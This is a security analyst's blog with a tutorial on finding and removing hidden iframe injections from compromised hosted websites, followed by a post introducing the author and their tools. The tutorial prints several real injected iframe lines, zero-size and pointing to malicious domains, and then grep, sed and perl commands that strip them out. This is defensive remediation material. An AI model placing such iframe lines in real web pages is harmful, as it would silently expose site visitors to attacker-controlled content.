Cleaning Iframe Injections, Lesson 1

Pretty often we get complaints that Google has marked a site as malicious. Usually this is an iframe injection, like 90% of the time. Sometimes its a PHP shell, but that's another blog entry. First step is to grab the page. Please use curl or wget for this. You COULD just surf to it, but we're security professionals, right?

You'll find something like this:

<iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Or:

<iframe src="http://pinoc.org/count.php?o=2" </iframe>
<iframe src="http://pinoc.info/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Or:

<iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://yahoo-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://msn-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>


Here's a handy perl one-liner for the pinoc domains (courtesy of http://blog.floogy.com/2008/08/fix-pinocorg-and-pinocinfo.html thanks!):

find /PATH/TO/START/FROM/ -type f | xargs perl -pi -e 's/\<iframe src\=\"http\:\/\/pinoc\.info\/count\.php\?o\=2\" width\=0 height\=0 style\=\"hidden\" frameborder\=0 marginheight\=0 marginwidth\=0 scrolling\=no\>\<\/iframe\>\<iframe src\=\"http\:\/\/pinoc\.org\/count\.php\?o\=2\" width\=0 height\=0 style\=\"hidden\" frameborder\=0 marginheight\=0 marginwidth\=0 scrolling\=no\>\<\/iframe\>//g'

To remove using sed instead:

First we make a grep string that catches all of the iframe. I like egrep:

From:

<iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

To:

grep -HRE "<iframe src=\"http:\/\/google-analyze\.org\/count\.php\?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>"

Note that the only difference between the strings is the domain they access. All of the files and options are the same. We use this to clean everything at once.

grep -HRE "<iframe src=\"http:\/\/.*\/count\.php\?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>" /home/user/*

This should find ALL of the injections. Be sure to redirect the output to a text file for later. The option -lRE should make grep spit out just the names of files. Now we build our sed-line:

sed "s/<iframe src=\"http:\/\/.*\/count.php?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g"

And attach it to our list (you DID make a list of filenames by using -lRE for grep and redirecting the output, right?):

cat ~/thelist.txt | xargs sed "s/<iframe src=\"http:\/\/.*\/count.php?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g"

This will output thelist.txt into xargs. Xargs will run the sed-line on every file in thelist.txt. Be sure to fix any paths with spaces or sed will break. If we're lucky, this should result in a clean home directory for your client :). If we aren't, well, hope you backed them up first! We can do this by adding -i.ext to the sed command:

cat ~/thelist.txt | xargs sed -i.shanbak "s/<iframe src=\"http:\/\/.*\/count.php?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g"


I use shanbak in case the client has other .bak files. This makes cleaning up the backups after you've verfied the iframes are gone a piece of cake and less hazardous to your client backups.

ich1 out.

Schools and Tools

Let's get the preliminaries out of the way:

My name is Shannon Francis, I'm a Computer Science student at a university in Florida. I also work for a web hosting company as an Abuse and Security Analyst. We get to see lots of interesting things and lots of boring, annoying ones, so I'm choosing to blog about them here.

I figure if I fix something and post about it, if someone somewhere finds it and it saves them a bit of time, I've done a mitzvah.

First lets talk about tools.

I do most of my work from a Windows XP machine. I can hear everyone out there tuning out, but bear with me. I work in an office environment and at any time may need to work from more than one computer that isn't my workstation. I chose my tools such that they match up with the majority of the boxes in the office and so that they would easily fit on a thumb drive for maximum portability and minimal hassle. I'm lazy like that :).

We use XMPP at work so I use pidgin (and OTR for encryption) to communicate with co-workers. I use Putty Connection Manager to SSH into servers and open more than one session at a time without cluttering my laptop (that's right, laptop :) too much. I use TrueCrypt to encrypt the drive storing my SSH keys and other important passwords and such. Can't overlook the importance of on-the-fly encryption, especially when you need to remain mobile (leaving valid SSH keys around is just tacky).

Sam Spade comes in handy for just about everything you could need to do before you SSH into a *nix server. I can ping, whois, dig, traceroute, etc., and we have a VPS set up at work for any *nix-y tasks we need to do from the outside of the server we're investigating. I use zenmap as opposed to plain old vanilla nmap (more people just tuned out, probably), mostly because it's what is easy and available in the Windows office environment, but honestly I don't have to use it that often.

Next post I'll talk about what command-line tools I use most and how for the first part of my job: finding the problem.

Welcome to the Sprawl....

Abandon hope all ye who enter here....